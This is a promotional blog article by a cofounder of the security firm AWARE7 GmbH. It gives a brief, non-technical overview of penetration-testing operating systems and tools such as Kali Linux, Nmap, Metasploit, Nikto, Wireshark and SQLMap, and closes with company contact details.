Hacking Tools presented for pentesters

Dr. Matteo Große-Kampmann

Hacking Tools presented for pentesters

As a pentester you need a broad arsenal of hacking tools. These are just as important as a sharp mind and stubbornness. As a pentester, you use hacking tools to uncover vulnerabilities in a system and report them to the company being tested.

Which are considered hacking tools?

With hacking tools, you see what an attacker sees and get a feel for the company’s attack surface. This ensures that the pentester analyzes your system the way an attacker would analyze it.

Of course, hacking tools are constantly evolving, as are attack strategies and methods. That’s why it’s already a challenge in the cyber security industry to stay up to date.

Hacking Tools – The operating system

With the operating system, the pentester lays the foundation for its hacking tools. There are a few choices here that leave the pentester spoilt for choice, from an individually designed Ubuntu to Linux Arch derivatives, he has plenty of choice in terms of functionality and stability.

Kali Linux

Kali Linux is one of the best known hacking distributions. Kali Linux is based on BackTrack and is developed by Offensive Security. It is based on Debian and comes with a large number of hacking tools pre-installed. An advantage of Kali is the proper documentation and a large and active community.

Parrot Security OS

Parrot is a relatively new player in the field of hacking operating systems. ParrotOS is aimed at pentesters who need a developer and Uentester-friendly environment with the ability to move anonymously anyway.

Ubuntu Linux

Ubuntu Ubuntu is a general purpose operating system and is therefore also suitable for a pentesting system. By installing Ubuntu you make sure that only the hacking tools you need are installed. However, you will also need to install these hacking tools yourself. This is time-consuming and the configuration can be nerve-wracking.

Black Arch

Black Arch  is a special Arch Linux derivative, especially for security frogs and pentesters. It is not very beginner friendly, because many tools do not work with the installation and have to be adapted. If you don’t feel safe on the command line, you should rather keep your hands off this distribution.

Hacking Tools – Must Haves

If the pentester lays the foundation for his work with the operating system, there are some must-haves that should be on board and functional. From the enlargement of the attack surface to post-exploitation, there are different tools, each of which should be ready for use:

Google or another search engine

Google is of course not a direct hacking tool, but through its powerful search function it is a powerful ally when it comes to gathering information about a potential system to be attacked. From CVEs you can find there, through Google Hacking Dorks you have various possibilities to use the powerful search engine for information research. You should be familiar with the basic search operators like “site”, “intitle”, “filetype” and others.

Subdomain Enumeration

For every potential intruder, finding subdomains is an essential step. Often behind forgotten subdomains lie old systems that can be easily attacked. Fierce or Amass are just two hacking tools you can use for this task.

Hacking Tools – Nmap

At the beginning of every penetration test there is usually also the use of the program Nmap. It is one of the oldest tools, but it constantly receives new updates and improvements. Nmap is used to map a network and analyze which endpoints are on the network and which services are running on the systems.

Hacking Tools – Metasploit

Metasploit is an open source project that allows penetration testers to use different programs to find and test vulnerabilities. Metasploit can also be used to develop exploits. Metasploit can be used to write malicious code that can bypass detection systems, perform vulnerability scans and launch remote attacks. Metasploit is available in three different versions: Professional, Community and Framework.

Hacking Tools – Nikto

Nikto is a tool that is included in Kali Linux and many other hacking distributions with installation. With this tool web servers can be scanned for different vulnerabilities. It is a command line tool which can perform cross site scripting, version checking and brute force attacks.

Hacking Tools – Wireshark

Another classic in the pentester tools area is Wireshark. Wireshark makes packets visible in networks and can help to detect security problems. Individual requests in the network can be picked up and analyzed in real time. Wireshark supports WLAN standards as well as Bluetooth, USB and FDDI.

Hacking Tools – SQLMap

The tool sqlmap is a tool which helps penetration testers to test SQL injections against any system. SQLMap can test different types of injections, such as time-based, boolean, error-based and stacked SQL injections. SQL injections occur when developers implement poor input masking and validation. An attacker attempts to execute its own database commands in the database.

Summary

With the help of the hacking tools presented in this article, the pentester’s job is much easier. Many of the tools presented in this article may also be of interest to developers who want to get involved with security. We at AWARE7 GmbH also use many of the presented tools in our penetration tests where we professionally test your infrastructure, application or network for vulnerabilities. We are happy to advise you on all questions concerning digital security.

 

Photo of author

Dr. Matteo Große-Kampmann

My name is Matteo Große-Kampmann. Together with Chris Wojzechowski I founded AWARE7 GmbH in Gelsenkirchen. I completed my PhD on "Towards Understanding Attack Surfaces of Analog and Digital Threats" and am a trained ISO 27001 Lead Auditor.
AWARE7 GmbH - Logo

+49 (0) 209 - 8830 6760

info@aware7.de

Google Plus Code F4X5+M2

Company

AWARE7 GmbH
Munscheidstr. 14
45886 Gelsenkirchen
Imprint | Privacy

About us
Open positions

Resources

Free e-learning
Downloads
Projects